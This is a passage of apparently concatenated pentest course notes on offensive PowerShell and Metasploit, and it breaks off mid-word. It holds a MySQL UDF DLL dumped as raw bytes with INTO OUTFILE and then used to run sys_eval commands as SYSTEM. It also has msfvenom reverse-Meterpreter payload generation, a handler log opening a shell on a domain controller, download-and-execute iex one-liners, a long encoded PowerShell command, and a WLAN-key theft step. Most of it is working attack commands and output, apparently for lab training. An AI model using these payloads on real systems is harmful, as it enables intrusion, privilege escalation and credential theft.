160,66,126,180,56,237,151,223,191,16,242,112,215,227,80,148,0,69,140,155,189,126,245,198,176,178,110,49,26,47,190,169,237,9,71,166,168,213,216,109,47,212,152,72,232,113,210,32,44,1,16,216,87,171,245,161 ,237,126,90,99,93,120,186,197,171,123,188,18,62,217,141,97,56,181,138,115,167,180,185,124,128,96,161,10,245,100,214,215,52,49,56,133,64,103,59,232,22,28,187,93,203,119,253,135,222,108,241,122,195,46,102 ,2,31,236,244,77,153,28,63,116,56,228,111,188,185,155,95,126,169,13,88,61,215,154,95,66,132,3,145,81,244,108,28,251,73,102,109,56,142,118,228,210,118,80,103,129,95,135,182,195,203,238,198,150,218,114,20 3,237,11,137,235,10,97,70,228,116,251,26,111,105,119,145,115,178,33,239,30,52,7,3,138,138,142,234,95,237,122,43,103,232,59,255,69,129,4,27,43,149,158,233,247,132,29,95,22,137,206,227,151,88,54,5,112,6,1 88,157,209,18,97,6,56,63,58,232,187,200,227,169,245,59,94,141,122,218,124,65,48,135,72,228,112,146,236,8,116,161,56,93,173,190,136,5,28,95,55,230,197,129,125,20,131,184,182,216,182,18,178,226,233,119,13 5,239,63,0,60,168,62,217,100,242,144,220,56,147,177,135,91,64,146,151,30,41,200,116,254,5,194,224,137,133,63,245,68,208,17,224,121,251,95,235,146,197,20,244,97,53,66,173,247,15,202,93,227,198,160,83,56, 208,77,28,76,152,108,119,193,105,75,86,30,159,99,133,35,251,116,221,101,38,173,141,86,117,236,43,154,184,218,184,86,196,43,246,215,239,240,201,110,106,13,66,40,104,205,73,194,238,33,9,248,42,2,60,180,14 2,36,210,164,200,46,111,138,97,77,19,47,131,67,59,73,133,238,117,132,31,231,247,109,154,123,150,198,93,72,198,61,65,93,161,65,164,146,196,157,95,92,181,222,136,101,44,228,218,15,136,254,210,71,132,234,1 25,46,109,61,83,15,164,63,155,226,42,186,21,30,227,162,23,189,225,230,152,172,11,74,201,117,35,111,157,222,144,112,25,197,232,142,180,235,193,178,230,128,239,113,53,128,83,144,26,86,108,212,127,154,252, 13,170,253,63,190,137,204,221,55,124,173,70,208,86,187,163,31,159,51,79,75,17,132,84,134,123,98,0,210,191,122,191,189,156,229,218,29,222,202,161,96,129,9,111,218,41,116,228,91,200,193,228,139,35,151,149 ,225,130,149,229,32,130,72,126,236,201,194,133,93,134,239,120,254,30,111,182,96,218,49,160,2,125,178,166,173,63,200,121,18,106,180,10,208,17,131,105,134,182,124,218,97,23,112,61,251,102,180,24,161,253,1 05,218,239,160,189,113,237,34,23,163,208,81,172,95,218,234,224,97,76,95,92,77,161,99,75,114,229,162,67,148,143,166,163,125,43,136,174,63,25,47,179,23,202,157,48,112,208,90,171,132,52,44,94,160,201,249,1 85,204,95,98,93,189,182,63,55,222,113,209,156,133,167,24,25,147,77,132,115,243,197,156,104,177,237,144,2,102,27,109,100,233,24,5,144,91,210,79,155,137,11,76,157,168,156,129,217,67,209,75,207,32,241,147, 1,165,0,237,41,225,7,251,235,37,230,249,255,214,235,155,231,80,243,144,67,165,63,251,9,90,203,48,48,60,158,109,85,38,190,69,125,18,135,147,229,175,245,144,211,53,156,83,199,141,204,31,244,236,101,77,187 ,198,91,240,58,23,16,68,102,3,98,218,144,147,193,171,95,88,190,224,27,70,244,114,23,48,108,70,127,207,62,187,207,54,223,131,208,92,208,170,63,230,163,127,255,43,125,20,69,111,93,191,4,83,131,250,252,18, 120,251,219,156,68,231,79,2,43,128,80,33,122,185,101,240,94,128,8,60,114,33,229,27,240,56,12,153,158,228,72,198,161,185,204,81,125,141,165,115,223,116,240,103,180,41,224,102,120,71,28,97,227,159,118,15, 127,218,49,192,64,122,184,6,65,211,135,212,196,177,249,140,135,188,72,67,113,205,238,27,239,115,131,99,88,240,66,142,147,37,191,55,31,248,215,253,30,0,250,163,60,224,25,210,9,33,51,88,239,51,246,52,208, 243,200,104,243,128,181,17,133,121,51,167,249,223,111,173,244,57,163,13,24,100,188,103,238,232,115,134,162,74,26,78,90,180,93,234,235,144,68,189,209,90,157,126,159,109,142,134,219,213,90,190,15,231,117, 16,180,179,29,251,178,77,126,17,254,63,187,99,42,36,216,155,22,50,217,178,117,4,217,114,133,249,130,176,45,42,29,46,181,126,17,157,175,87,205,201,230,193,204,168,236,139,86,126,181,139,247,129,162,200,8 ,198,31,106,217,223,164,123,182,60,54,176,50,142,25,121,179,135,235,225,154,137,145,170,57,146,183,203,62,94,55,65,20,202,188,209,134,208,246,240,98,178,45,89,196,125,17,96,169,74,21,202,218,189,193,168 ,35,9,195,202,165,151,153,67,177,248,210,203,175,190,13,233,91,34,40,81,205,103,205,250,1,102,138,24,64,148,176,22,36,77,107,213,205,2,66,177,49,218,251,114,27,103,59,210,247,239,154,77,168,220,156,142, 77,250,113,33,44,214,152,246,36,58,52,82,43,215,181,100,154,203,210,223,117,212,148,82,175,176,40,71,150,217,98,142,138,170,77,242,104,2,196,208,176,226,41,3,98,126,106,222,103,160,178,124,32,11,250,191 ,44,118,163,177,182,31,192,183,49,238,21,121,191,144,18,20,247,42,181,70,219,150,4,151,201,203,170,27,24,100,14,204,197,250,27,19,190,180,114,108,11,21,237,196,252,100,154,220,10,10,114,235,215,180,182, 13,228,155,254,255,172,48,113,74,249,243,191,66,143,66,250,216,44,143,253,223,231,153,16,158,175,215,243,32,243,10,36,117) INTO OUTFILE 'C:\\Program Files\\MySQL\\MySQL Server 5.6\\lib\\plugin\\lib_mysqludf_ sys.dll' FIELDS ESCAPED BY '' ``` - Create a ```function``` ``` CREATE FUNCTION sys_eval RETURNS STRING SONAME 'lib_mysqludf_sys.dll' ``` - Execute commands as ```SYSTEM``` ``` Select sys_eval('whoami') ``` ###### Reads - [Putting the MY in phpMyAdmin](https://pen-testing.sans.org/blog/pen-testing/2013/04/10/putting-the-my-in-phpmyadmin) - [Script Execution and Privilege Escalation on Jenkins Server](http://www.labofapenetrationtester.com/2014/08/script-execution-and-privilege-esc-jenkins.html) ================================================ FILE: 52-Metasploit-Part-1.md ================================================ #### 52. Metasploit Part 1 - PowerShell payload formats - psh - psh-cmd - psh-net - psh-reflection ```sh root@kali:~# msfvenom --help-formats psh Executable formats asp, aspx, aspx-exe, axis2, dll, elf, elf-so, exe, exe-only, exe-service, exe-small, hta-psh, jar, jsp, loop-vbs, macho, msi, msi-nouac, osx-app, psh, psh-cmd, psh-net, psh-reflection, vba, vba-exe, vba-psh, vbs, war Transform formats bash, c, csharp, dw, dword, hex, java, js_be, js_le, num, perl, pl, powershell, ps1, py, python, raw, rb, ruby, sh, vbapplication, vbscript root@kali:~# ``` - Generating PowerShell payloads - ```Script``` ```sh root@kali:~# msfvenom -p windows/x64/meterpreter/reverse_https LHOST=10.0.0.206 -f psh > ps_payload64.ps1 No platform was selected, choosing Msf::Module::Platform::Windows from the payload No Arch selected, selecting Arch: x64 from the payload No encoder or badchars specified, outputting raw payload Payload size: 743 bytes Final size of psh file: 4380 bytes root@kali:~# ``` ```sh root@kali:~# file ps_payload64.ps1 ps_payload64.ps1: ASCII text, with very long lines, with CRLF line terminators root@kali:~# ``` - ```Shellcode``` ```sh root@kali:~# msfvenom -p windows/x64/meterpreter/reverse_https LHOST=10.0.0.206 -f powershell > ps_shellcode No platform was selected, choosing Msf::Module::Platform::Windows from the payload No Arch selected, selecting Arch: x64 from the payload No encoder or badchars specified, outputting raw payload Payload size: 668 bytes Final size of powershell file: 3265 bytes root@kali:~# ``` ```sh root@kali:~# file ps_shellcode ps_shellcode: ASCII text, with very long lines, with CRLF line terminators root@kali:~# ``` - ```psh-reflection``` - Very useful - Compilation happens in memory - No need of execute privileges on temp directory - Use this often ```sh root@kali:~# msfvenom -p windows/x64/meterpreter/reverse_https LHOST=10.0.0.206 -f psh-reflection > ps_payload64.ps1 No platform was selected, choosing Msf::Module::Platform::Windows from the payload No Arch selected, selecting Arch: x64 from the payload No encoder or badchars specified, outputting raw payload Payload size: 687 bytes Final size of psh-reflection file: 3118 bytes root@kali:~# ``` ```sh root@kali:~# file ps_payload64.ps1 ps_payload64.ps1: ASCII text, with very long lines, with CRLF line terminators root@kali:~# ``` - ```windows/reverse/reverse_powershell``` ```sh root@kali:~# msfvenom -p cmd/windows/reverse_powershell LHOST=10.0.0.206 > ps_payload.ps1 No platform was selected, choosing Msf::Module::Platform::Windows from the payload No Arch selected, selecting Arch: cmd from the payload No encoder or badchars specified, outputting raw payload Payload size: 1223 bytes root@kali:~# ``` ```sh root@kali:~# file ps_payload.ps1 ps_payload.ps1: ASCII text, with very long lines, with no line terminators root@kali:~# ``` - Metasploit modules which use PowerShell - ```exploit/windows/smb/psexec_psh``` - payload is never written to disk ```sh msf > use exploit/windows/smb/psexec_psh ``` ```sh msf exploit(psexec_psh) > show info Name: Microsoft Windows Authenticated Powershell Command Execution Module: exploit/windows/smb/psexec_psh Platform: Windows Privileged: Yes License: Metasploit Framework License (BSD) Rank: Manual Disclosed: 1999-01-01 Provided by: Royce @R3dy__ Davis RageLtMan Available targets: Id Name -- ---- 0 Automatic Basic options: Name Current Setting Required Description ---- --------------- -------- ----------- DryRun false no Prints the powershell command that would be used RHOST yes The target address RPORT 445 yes The SMB service port (TCP) SERVICE_DESCRIPTION no Service description to to be used on target for pretty listing SERVICE_DISPLAY_NAME no The service display name SERVICE_NAME no The service name SMBDomain . no The Windows domain to use for authentication SMBPass no The password for the specified username SMBUser no The username to authenticate as Payload information: Space: 3072 Description: This module uses a valid administrator username and password to execute a powershell payload using a similar technique to the "psexec" utility provided by SysInternals. The payload is encoded in base64 and executed from the commandline using the -encodedcommand flag. Using this method, the payload is never written to disk, and given that each payload is unique, is less prone to signature based detection. A persist option is provided to execute the payload in a while loop in order to maintain a form of persistence. In the event of a sandbox observing PSH execution, a delay and other obfuscation may be added to avoid detection. In order to avoid interactive process notifications for the current user, the psh payload has been reduced in size and wrapped in a powershell invocation which hides the window entirely. References: https://cvedetails.com/cve/CVE-1999-0504/ OSVDB (3106) http://www.accuvant.com/blog/2012/11/13/owning-computers-without-shell-access http://sourceforge.net/projects/smbexec/ http://technet.microsoft.com/en-us/sysinternals/bb897553.aspx msf exploit(psexec_psh) > ``` - ```exploit/windows/local/powershell_cmd_upgrade``` - used to upgrade a ```native cmd``` to ```meterpreter``` ```sh msf > use exploit/windows/local/powershell_cmd_upgrade ``` ```sh msf exploit(powershell_cmd_upgrade) > show info Name: Windows Command Shell Upgrade (Powershell) Module: exploit/windows/local/powershell_cmd_upgrade Platform: Windows Privileged: No License: Metasploit Framework License (BSD) Rank: Excellent Disclosed: 1999-01-01 Provided by: Ben Campbell Available targets: Id Name -- ---- 0 Universal Basic options: Name Current Setting Required Description ---- --------------- -------- ----------- SESSION yes The session to run this module on. Payload information: Description: This module executes Powershell to upgrade a Windows Shell session to a full Meterpreter session. msf exploit(powershell_cmd_upgrade) > ``` ================================================ FILE: 53-Metasploit-Part-2.md ================================================ #### 53. Metasploit Part 2 ###### Manually executing scripts and modules - Upload a script - Use download and execute one liner - Use –EncodedCommand parameter of PowerShell - Generate ```Reverse Shell``` using ```msfvenom``` ```sh root@kali:~# msfvenom -p windows/x64/meterpreter/reverse_https LHOST=10.0.0.206 -f psh > ps_payload64.ps1 No platform was selected, choosing Msf::Module::Platform::Windows from the payload No Arch selected, selecting Arch: x64 from the payload No encoder or badchars specified, outputting raw payload Payload size: 743 bytes Final size of psh file: 4380 bytes root@kali:~# ``` ```sh root@kali:~# file ps_payload64.ps1 ps_payload64.ps1: ASCII text, with very long lines, with CRLF line terminators root@kali:~# ``` - Execute the ```Reverse Shell``` on victim ```PowerShell PS C:\Users\Administrator\Desktop> .\ps_payload64.ps1 2004 PS C:\Users\Administrator\Desktop> ``` - Setup ```multi handler``` ```sh root@kali:~# msfconsole msf > use exploit/multi/handler msf exploit(handler) > set PAYLOAD windows/x64/meterpreter/reverse_https PAYLOAD => windows/x64/meterpreter/reverse_https msf exploit(handler) > show options Module options (exploit/multi/handler): Name Current Setting Required Description ---- --------------- -------- ----------- Payload options (windows/x64/meterpreter/reverse_https): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) LHOST yes The local listener hostname LPORT 8443 yes The local listener port LURI no The HTTP Path Exploit target: Id Name -- ---- 0 Wildcard Target msf exploit(handler) > set LHOST 10.0.0.206 LHOST => 10.0.0.206 msf exploit(handler) > exploit [*] Started HTTPS reverse handler on https://10.0.0.206:8443 [*] Starting the payload handler... [*] https://10.0.0.206:8443 handling request from 10.0.0.233; (UUID: yc9exijd) Staging x64 payload (1190467 bytes) ... [*] Meterpreter session 1 opened (10.0.0.206:8443 -> 10.0.0.233:24056) at 2017-07-18 22:28:14 -0400 meterpreter > pwd C:\Users\Administrator meterpreter > ``` - Upload a ```script``` ```sh meterpreter > upload /root/Get-Information.ps1 C:\\Users\\Administrator [*] uploading : /root/Get-Information.ps1 -> C:\Users\Administrator [*] uploaded : /root/Get-Information.ps1 -> C:\Users\Administrator\Get-Information.ps1 meterpreter > shell Process 2664 created. Channel 2 created. Microsoft Windows [Version 6.3.9600] (c) 2013 Microsoft Corporation. All rights reserved. C:\Users\Administrator>dir dir Volume in drive C has no label. Volume Serial Number is 00CC-8AA0 Directory of C:\Users\Administrator 07/18/2017 07:32 PM . 07/18/2017 07:32 PM .. 07/13/2017 12:59 PM Contacts 07/18/2017 07:28 PM Desktop 07/17/2017 11:37 AM Documents 07/18/2017 05:24 PM Downloads 07/13/2017 12:59 PM Favorites 07/18/2017 07:32 PM 3,628 Get-Information.ps1 07/13/2017 12:59 PM Links 07/13/2017 12:59 PM Music 07/13/2017 12:59 PM Pictures 07/13/2017 12:59 PM Saved Games 07/13/2017 12:59 PM Searches 07/13/2017 12:59 PM Videos 1 File(s) 3,628 bytes 13 Dir(s) 8,540,938,240 bytes free C:\Users\Administrator> ``` ```sh C:\Users\Administrator>C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ep bypass . .\Get-Information.ps1;Get-Information Logged in users: C:\Windows\system32\config\systemprofile C:\Windows\ServiceProfiles\LocalService C:\Windows\ServiceProfiles\NetworkService C:\Users\Administrator C:\Users\MSSQLSERVER Powershell environment: Install PID ConsoleHostShortcutTargetX86 ConsoleHostShortcutTarget Install Putty trusted hosts: Putty saved sessions: Recently used commands: regedit\1 a Shares on the machine: CATimeout=0 CSCFlags=4352 MaxUses=4294967295 Path=C:\Windows\SYSVOL\sysvol Permissions=0 Remark=Logon server share ShareName=SYSVOL Type=0 CATimeout=0 CSCFlags=4352 MaxUses=4294967295 Path=C:\Windows\SYSVOL\sysvol\pfpt.com\SCRIPTS Permissions=0 Remark=Logon server share ShareName=NETLOGON Type=0 Environment variables: C:\Windows\system32\cmd.exe NO 1 Windows_NT C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Python27;C:\Program Files\Java\jdk1.8.0_131\bin .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC AMD64 Intel64 Family 6 Model 78 Stepping 3, GenuineIntel 6 4e03 C:\Windows\system32\WindowsPowerShell\v1.0\Modules\ C:\Windows\TEMP C:\Windows\TEMP SYSTEM C:\Windows More details for current user: \\WIN-2012-DC PFPT.COM PFPT Administrator C:\Users\Administrator \Users\Administrator C: C:\Users\Administrator\AppData\Roaming C:\Users\Administrator\AppData\Local PFPT SNMP community strings: SNMP community strings for current user: Installed Applications: Microsoft Help Viewer 1.1 Microsoft Visual Studio 2010 Tools for Office Runtime (x64) Mozilla Firefox 54.0.1 (x64 en-US) Mozilla Maintenance Service Oracle VM VirtualBox Guest Additions 5.1.22 Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 Java 8 Update 131 (64-bit) Java SE Development Kit 8 Update 131 (64-bit) Visual Studio 2010 Prerequisites - English Microsoft Office Office 64-bit Components 2010 Microsoft Office Shared 64-bit MUI (English) 2010 Microsoft Office Shared 64-bit Setup Metadata MUI (English) 2010 Microsoft Visual Studio 2010 Tools for Office Runtime (x64) Microsoft Help Viewer 1.1 Installed Applications for current user: Domain Name: 0 pfpt.com 4294967295 \\WIN-2012-DC.pfpt.com 0 Contents of /etc/hosts: # Copyright (c) 1993-2009 Microsoft Corp. # # This is a sample HOSTS file used by Microsoft TCP/IP for Windows. # # This file contains the mappings of IP addresses to host names. Each # entry should be kept on an individual line. The IP address should # be placed in the first column followed by the corresponding host name. # The IP address and the host name should be separated by at least one # space. # # Additionally, comments (such as these) may be inserted on individual # lines or following the machine name denoted by a '#' symbol. # # For example: # # 102.54.94.97 rhino.acme.com # source server # 38.25.63.10 x.acme.com # x client host # localhost name resolution is handled within DNS itself. # 127.0.0.1 localhost # ::1 localhost Running Services: These Windows services are started: Active Directory Domain Services Active Directory Web Services Background Intelligent Transfer Service Background Tasks Infrastructure Service Base Filtering Engine Certificate Propagation COM+ Event System Cryptographic Services DCOM Server Process Launcher DFS Namespace DFS Replication DHCP Client Diagnostic Policy Service Diagnostics Tracking Service Distributed Transaction Coordinator DNS Client DNS Server Group Policy Client IKE and AuthIP IPsec Keying Modules Intersite Messaging IP Helper IPsec Policy Agent Kerberos Key Distribution Center Local Session Manager Netlogon Network List Service Network Location Awareness Network Store Interface Service Plug and Play Power Print Spooler Remote Desktop Configuration Remote Desktop Services Remote Desktop Services UserMode Port Redirector Remote Procedure Call (RPC) RPC Endpoint Mapper Security Accounts Manager Server Shell Hardware Detection System Event Notification Service System Events Broker Task Scheduler TCP/IP NetBIOS Helper Themes User Access Logging Service User Profile Service Virtual Disk VirtualBox Guest Additions Service Windows Connection Manager Windows Event Log Windows Firewall Windows Font Cache Service Windows Licensing Monitoring Service Windows Management Instrumentation Windows Remote Management (WS-Management) Windows Time WinHTTP Web Proxy Auto-Discovery Service Workstation The command completed successfully. Account Policy: Force user logoff how long after time expires?: Never Minimum password age (days): 1 Maximum password age (days): 42 Minimum password length: 7 Length of password history maintained: 24 Lockout threshold: Never Lockout duration (minutes): 30 Lockout observation window (minutes): 30 Computer role: PRIMARY The command completed successfully. Local users: User accounts for \\WIN-2012-DC ------------------------------------------------------------------------------- Administrator Guest krbtgt The command completed successfully. Local Groups: Aliases for \\WIN-2012-DC ------------------------------------------------------------------------------- *Access Control Assistance Operators *Account Operators *Administrators *Allowed RODC Password Replication Group *Backup Operators *Cert Publishers *Certificate Service DCOM Access *Cryptographic Operators *Denied RODC Password Replication Group *Distributed COM Users *DnsAdmins *Event Log Readers *Guests *HelpLibraryUpdaters *Hyper-V Administrators *IIS_IUSRS *Incoming Forest Trust Builders *Network Configuration Operators *Performance Log Users *Performance Monitor Users *Pre-Windows 2000 Compatible Access *Print Operators *RAS and IAS Servers *RDS Endpoint Servers *RDS Management Servers *RDS Remote Access Servers *Remote Desktop Users *Remote Management Users *Replicator *Server Operators *Terminal Server License Servers *Users *Windows Authorization Access Group *WinRMRemoteWMIUsers__ The command completed successfully. WLAN Info: The following command was not found: wlan show all. C:\Users\Administrator> ``` - Use download and execute one liner ```sh C:\Users\Administrator>C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -c iex ((New-Object System.Net.WebClient).DownloadString('https://raw.githubusercontent.com/samratashok/nishang/master/powerpreter/Powerpreter.psm1'));Get-WLAN-Keys C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -c iex ((New-Object System.Net.WebClient).DownloadString('https://raw.githubusercontent.com/samratashok/nishang/master/powerpreter/Powerpreter.psm1'));Get-WLAN-Keys C:\Users\Administrator> ``` ```sh C:\Users\Administrator>C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -c iex ((New-Object System.Net.WebClient).DownloadString('https://raw.githubusercontent.com/samratashok/nishang/master/powerpreter/Powerpreter.psm1'));Check-VM C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -c iex ((New-Object System.Net.WebClient).DownloadString('https://raw.githubusercontent.com/samratashok/nishang/master/powerpreter/Powerpreter.psm1'));Check-VM This is a Hyper-V machine. This is a Virtual Box. C:\Users\Administrator> ``` - Use –EncodedCommand parameter of PowerShell In Windows Call the function at the end of the script ![Image of Call function](images/21.jpeg) ```PowerShell PS C:\Users\Administrator\Desktop\nishang-master> Import-Module .\nishang.psm1 WARNING: The names of some imported commands from the module 'nishang' include unapproved verbs that might make them less discoverable. To find the commands with unapproved verbs, run the Import-Module command again with the Verbose parameter. For a list of approved verbs, type Get-Verb. WARNING: Some imported command names contain one or more of the following restricted characters: # , ( ) {{ }} [ ] & - / \ $ ^ ; : " ' < > | ? @ ` * % + = ~ PS C:\Users\Administrator\Desktop\nishang-master> ``` ```PowerShell PS C:\Users\Administrator\Desktop\nishang-master> Invoke-Encode .\Gather\Get-WLAN-Keys.ps1 -OutCommand Encoded data written to .\encoded.txt Encoded command written to .\encodedcommand.txt PS C:\Users\Administrator\Desktop\nishang-master> ``` In Metasploit shell ```sh C:\Users\Administrator>C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -e SQBuAHYAbwBrAGUALQBFAHgAcAByAGUAcwBzAGkAbwBuACAAJAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAgACgAJAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBEAGUAZgBsAGEAdABlAFMAdAByAGUAYQBtACAAKAAkACgATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACAAKAAsACQAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACcAZABaAEoAUgBhADkAcwB3AEUATQBmAGYAQgBmAG8ATwBoADUAdQBIAEIARwBhADcAZQB4AHEAVQBwAFoAQgAxADIAUQBqAE4ASABGAE4AbgBkAEcATwBNAG8AdABnAFgAUwA2AHMAcwBHAGUAbgBjAHQASABUADcANwBwAFAAdABVAEwAcQB0ADAANAB1AFEANwB2ADYALwAvADUAMQAwACsAOAA2AFUAcABLAHkAQgBqADAAagB4AHQAUgBZAG0AdgBzAFEASABEADUAdwA5AGMAdgBiADIAaABMAE8AawArAEoAcAB0ADgAbQBKAFYAYwBKAFkAcABMADQAVwBwAEkAUgBjAFAAMgBvAG8ASwBEAGwASwBWAEUAcQBxAHUAYQBUADMAYwA5AHEASwA5AGQAWABDADkAWABtAFQAUQBPAHIAdABYAEcAbgAzAEMAVwBTAEMAOABYAHgAWQBYAFYANgB0ADgAdQA5AHAAawBuAEcAMgBsADgAdABBAGUAQwBjACsAMAB5AGsAQwBwAFUAVABnAGcAdgBLAGUAQgA1AE0AVQBkAFYAdgAvAHcAdABoAEsAZgA1AEUAMwBuAEMAWABZAEkAcgBqAE8AdwBkADcAWQBCADQAVQBGAFUAagBUAEwASwBrAHgATQBVAEcARwBTAGgAUgBnAEkASwBvAHQANQBsAHIARwBmADUAWgBmAEUAcABYAHkAOAA1AHkAdwBzADQASAAvAHMATwBKAGsAUABmAFEAMwB5ADkAeQBpADQANQBrADAAVAB0AFcAWgBxADIAMQBzAHYAUwBWAHAAaABZAFYANgBlAHYAMwA1AHkAZQBqAGgARQBmAFEAcgBVAGkAMgBlADIAUwAwAGoAYQBwAEYAMAAwAHcARgBGADcAYQAyADkAUwBNAHoAOABUAFoAeQBYAG0AUAArADMAYgBSAFYAQgByAHAAbgBUAEsAVgBNAHYAVgAwADkAagAzADQAQwBpAGMAYQBtAE0ANwA2AE0ASQBRADEATwBZAFIAMwA5AHoAQQBIAGcAKwBRAGwAOQBDAGMASQBxAE0ATgBUADMALwBBAFQAQwB0AFIAWQBVAGwAeQBRAEMAeABTAEkAYwAwAEcARQB6AGsAQwAwADAAQgBvACsAZQAzAFMAUQBqADcAbABSAHkAUAAxAGcASABZAHAAUwB4AHAAdgBkAGoANgBDAEIAeAA4AGwATgBzAHIAVwBqAGMAagByADcAZABmAFQARQArADkAWQA2AHEAawBMAFYAdwBmAGgAWQB3AFkAdgBTAEsAMgB5ADEASwBIAEUAYQA5AGIASwAvADcAZgBvADcATwBJAFAAbwAxAGMAUgAwAFcAcgA4AEUASAA1AGoATAA1ADgAegAvAGQAbQBsAEUAZwAvAE4AbwBjAGgAUAAxAG4AegBVAGYAeABtAEUARQBjAGgAYgAyAFAAdwBhAFUAcwA5ADgAPQAnACkAKQApACkALAAgAFsASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAE0AbwBkAGUAXQA6ADoARABlAGMAbwBtAHAAcgBlAHMAcwApACkALAAgAFsAVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkAKQApAC4AUgBlAGEAZABUAG8ARQBuAGQAKAApADsA C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -e SQBuAHYAbwBrAGUALQBFAHgAcAByAGUAcwBzAGkAbwBuACAAJAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAgACgAJAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBEAGUAZgBsAGEAdABlAFMAdAByAGUAYQBtACAAKAAkACgATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACAAKAAsACQAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACcAZABaAEoAUgBhADkAcwB3AEUATQBmAGYAQgBmAG8ATwBoADUAdQBIAEIARwBhADcAZQB4AHEAVQBwAFoAQgAxADIAUQBqAE4ASABGAE4AbgBkAEcATwBNAG8AdABnAFgAUwA2AHMAcwBHAGUAbgBjAHQASABUADcANwBwAFAAdABVAEwAcQB0ADAANAB1AFEANwB2ADYALwAvADUAMQAwACsAOAA2AFUAcABLAHkAQgBqADAAagB4AHQAUgBZAG0AdgBzAFEASABEADUAdwA5AGMAdgBiADIAaABMAE8AawArAEoAcAB0ADgAbQBKAFYAYwBKAFkAcABMADQAVwBwAEkAUgBjAFAAMgBvAG8ASwBEAGwASwBWAEUAcQBxAHUAYQBUADMAYwA5AHEASwA5AGQAWABDADkAWABtAFQAUQBPAHIAdABYAEcAbgAzAEMAVwBTAEMAOABYAHgAWQBYAFYANgB0ADgAdQA5AHAAawBuAEcAMgBsADgAdABBAGUAQwBjACsAMAB5AGsAQwBwAFUAVABnAGcAdgBLAGUAQgA1AE0AVQBkAFYAdgAvAHcAdABoAEsAZgA1AEUAMwBuAEMAWABZAEkAcgBqAE8AdwBkADcAWQBCADQAVQBGAFUAagBUAEwASwBrAHgATQBVAEcARwBTAGgAUgBnAEkASwBvAHQANQBsAHIARwBmADUAWgBmAEUAcABYAHkAOAA1AHkAdwBzADQASAAvAHMATwBKAGsAUABmAFEAMwB5ADkAeQBpADQANQBrADAAVAB0AFcAWgBxADIAMQBzAHYAUwBWAHAAaABZAFYANgBlAHYAMwA1AHkAZQBqAGgARQBmAFEAcgBVAGkAMgBlADIAUwAwAGoAYQBwAEYAMAAwAHcARgBGADcAYQAyADkAUwBNAHoAOABUAFoAeQBYAG0AUAArADMAYgBSAFYAQgByAHAAbgBUAEsAVgBNAHYAVgAwADkAagAzADQAQwBpAGMAYQBtAE0ANwA2AE0ASQBRADEATwBZAFIAMwA5AHoAQQBIAGcAKwBRAGwAOQBDAGMASQBxAE0ATgBUADMALwBBAFQAQwB0AFIAWQBVAGwAeQBRAEMAeABTAEkAYwAwAEcARQB6AGsAQwAwADAAQgBvACsAZQAzAFMAUQBqADcAbABSAHkAUAAxAGcASABZAHAAUwB4AHAAdgBkAGoANgBDAEIAeAA4AGwATgBzAHIAVwBqAGMAagByADcAZABmAFQARQArADkAWQA2AHEAawBMAFYAdwBmAGgAWQB3AFkAdgBTAEsAMgB5ADEASwBIAEUAYQA5AGIASwAvADcAZgBvADcATwBJAFAAbwAxAGMAUgAwAFcAcgA4AEUASAA1AGoATAA1ADgAegAvAGQAbQBsAEUAZwAvAE4AbwBjAGgAUAAxAG4AegBVAGYAeABtAEUARQBjAGgAYgAyAFAAdwBhAFUAcwA5ADgAPQAnACkAKQApACkALAAgAFsASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAE0AbwBkAGUAXQA6ADoARABlAGMAbwBtAHAAcgBlAHMAcwApACkALAAgAFsAVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkAKQApAC4AUgBlAGEAZABUAG8ARQBuAGQAKAApADsA C:\Users\Administrator> ``` ###### Using modules to execute PowerShell scripts - post/windows/manage/powershell/exec_powershell ```sh msf > use post/windows/manage/powershell/exec_powershell ``` ```sh msf post(exec_powershell) > show info Name: Windows Manage PowerShell Download and/or Execute Module: post/windows/manage/powershell/exec_powershell Platform: Windows Arch: Rank: Normal Provided by: Nicholas Nam (nick RageLtMan Basic options: Name Current Setting Required Description ---- --------------- -------- ----------- SCRIPT /usr/share/metasploit-framework/scripts/ps/msflag.ps1 yes Path to the local PS script SESSION yes The session to run this module on. Description: This module will download and execute a PowerShell script over a meterpreter session. The user may also enter text substitutions to be made in memory before execution. Setting VERBOSE to true will output both the script prior to execution and the results. msf post(exec_powershell) > ``` - exploit/multi/script/web_delivery ```sh msf > use exploit/multi/script/web_delivery ``` ```sh msf exploit(web_delivery) > show info Name: Script Web 